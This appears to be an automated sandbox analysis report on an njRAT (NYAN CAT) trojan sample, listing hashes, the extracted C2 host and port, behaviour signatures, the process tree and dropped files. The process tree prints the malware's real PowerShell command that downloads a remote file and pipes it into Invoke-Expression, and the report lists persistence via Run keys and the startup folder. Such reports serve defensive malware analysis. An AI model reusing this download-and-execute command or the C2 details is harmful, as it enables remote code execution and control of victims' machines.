Overview

overview

10

Static

static

d173b9844b...bd.exe

windows7_x64

1

d173b9844b...bd.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    05-11-2021 12:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe

  • Size

    4KB

  • MD5

    b9a1c7dd8171afe0e3fc1524f5eafb18

  • SHA1

    19b79357841b2bcb3438011f4c8e45f7278aeaa9

  • SHA256

    d173b9844be24a9172f2f2adcde3dd65090afa690b1bd952a7da01de33ad60ef

  • SHA512

    d57c9cf4a489dec1f8b17351173e1ffc202e454f214b85e132fbd5d8af2d4a611e50e1a7f85eb0dfce438539aaec3b143d1fafafbaa0def914f6401c5993da6d

Score
10/10
njratnyan catpersistencesuricatatrojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

redlan.linkpc.net:5553

Mutex

3b407dd04ed042

Attributes
  • reg_key

    3b407dd04ed042

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)

    suricata
  • Blocklisted process makes network request 18 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe
    "C:\Users\Admin\AppData\Local\Temp\d173b9844be24a9172f2f2adcde3dd65090afa690b1bd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -c cd $env:tmp;Invoke-WebRequest http://79.155.175.45/verona.png -OutFile Error.png;gc Error.png | iex
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4404
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        3⤵
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4540
        • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
          "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\tmp4C38.tmp.jar"
          4⤵
          • Drops file in Program Files directory
          PID:2400
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmpA219.tmp.JS"
          4⤵
          • Drops startup file
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\SysWOW64\wscript.exe
            "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\tmpA219.tmp.JS"
            5⤵
            • Blocklisted process makes network request
            • Drops startup file
            • Adds Run key to start application
            PID:4272

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp4C38.tmp.jar
    MD5

    6fe6bac5dd75eeb70521ff947fb7008b

    SHA1

    1bceb447ec1174f0b2a34cbdf08703dc8020a6b2

    SHA256

    0e0e37118bddbf947175118a866700bc475b80543864b28ca0870d337c0ffcd6

    SHA512

    4cf68c825c5fdf5b53d4a92c8b24929aaf25a4f6b0e9cf5971a28428461d2343b1f786e993bdbae5b06be4f0e59c23b62eff2ad9dbf32e8ec6ce78df98e5c9c4

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\tmpA219.tmp.JS
    MD5

    f07fe7d0a3b59b69c19c450d1516158e

    SHA1

    856a9c5c3938312c27697698e05b97fe8725db92

    SHA256

    db4639d5386e9702d006fdf268e33675e1b8d0e4886aadd04d0adcde9b08c426

    SHA512

    283a1930c0b48a0224cabc908387f232b2adecda9f221040cf64b8eb81e0f67a092e338b6219e593fac207afb8333cc3ef8cdf1de3a44289d894037d313b19db

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmpA219.tmp.JS
    MD5

    f07fe7d0a3b59b69c19c450d1516158e

    SHA1

    856a9c5c3938312c27697698e05b97fe8725db92

    SHA256

    db4639d5386e9702d006fdf268e33675e1b8d0e4886aadd04d0adcde9b08c426

    SHA512

    283a1930c0b48a0224cabc908387f232b2adecda9f221040cf64b8eb81e0f67a092e338b6219e593fac207afb8333cc3ef8cdf1de3a44289d894037d313b19db

    Download Submit
  • C:\Users\Admin\AppData\Roaming\tmpA219.tmp.JS
    MD5

    f07fe7d0a3b59b69c19c450d1516158e

    SHA1

    856a9c5c3938312c27697698e05b97fe8725db92

    SHA256

    db4639d5386e9702d006fdf268e33675e1b8d0e4886aadd04d0adcde9b08c426

    SHA512

    283a1930c0b48a0224cabc908387f232b2adecda9f221040cf64b8eb81e0f67a092e338b6219e593fac207afb8333cc3ef8cdf1de3a44289d894037d313b19db

    Download Submit
  • memory/2400-190-0x0000000003070000-0x0000000003080000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-188-0x0000000003060000-0x0000000003070000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-192-0x0000000003090000-0x00000000030A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-193-0x00000000030A0000-0x00000000030B0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-179-0x0000000000000000-mapping.dmp
    Download
  • memory/2400-191-0x0000000003080000-0x0000000003090000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-189-0x0000000000E50000-0x0000000000E51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2400-181-0x0000000002DD0000-0x0000000003040000-memory.dmp
    Filesize

    2.4MB

    Download
  • memory/2400-187-0x0000000003050000-0x0000000003060000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-182-0x0000000002DD0000-0x0000000003040000-memory.dmp
    Filesize

    2.4MB

    Download
  • memory/2400-186-0x0000000003040000-0x0000000003050000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2400-183-0x0000000000E50000-0x0000000000E51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3036-198-0x0000000000000000-mapping.dmp
    Download
  • memory/4272-200-0x0000000000000000-mapping.dmp
    Download
  • memory/4368-115-0x0000000000B90000-0x0000000000B91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4404-129-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-121-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-154-0x0000023A3A3F8000-0x0000023A3A3F9000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4404-155-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-156-0x0000023A3C5D0000-0x0000023A3C5DB000-memory.dmp
    Filesize

    44KB

    Download
  • memory/4404-117-0x0000000000000000-mapping.dmp
    Download
  • memory/4404-118-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-159-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-119-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-144-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-120-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-128-0x0000023A3C650000-0x0000023A3C651000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4404-122-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-123-0x0000023A3A370000-0x0000023A3A371000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4404-124-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-125-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-126-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-127-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-143-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-141-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-140-0x0000023A3A3F6000-0x0000023A3A3F8000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-139-0x0000023A3A3F3000-0x0000023A3A3F5000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-138-0x0000023A3A3F0000-0x0000023A3A3F2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4404-137-0x0000023A205A0000-0x0000023A205A2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/4540-160-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-172-0x0000000009C30000-0x0000000009C31000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-171-0x00000000099D0000-0x00000000099D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-169-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-168-0x0000000009A60000-0x0000000009A61000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-167-0x0000000007260000-0x00000000072FC000-memory.dmp
    Filesize

    624KB

    Download
  • memory/4540-166-0x0000000009EC0000-0x0000000009EC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-165-0x0000000009890000-0x0000000009891000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-162-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-161-0x0000000004FF0000-0x0000000004FF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/4540-158-0x000000000040676E-mapping.dmp
    Download
  • memory/4540-157-0x0000000000400000-0x000000000040C000-memory.dmp
    Filesize

    48KB

    Download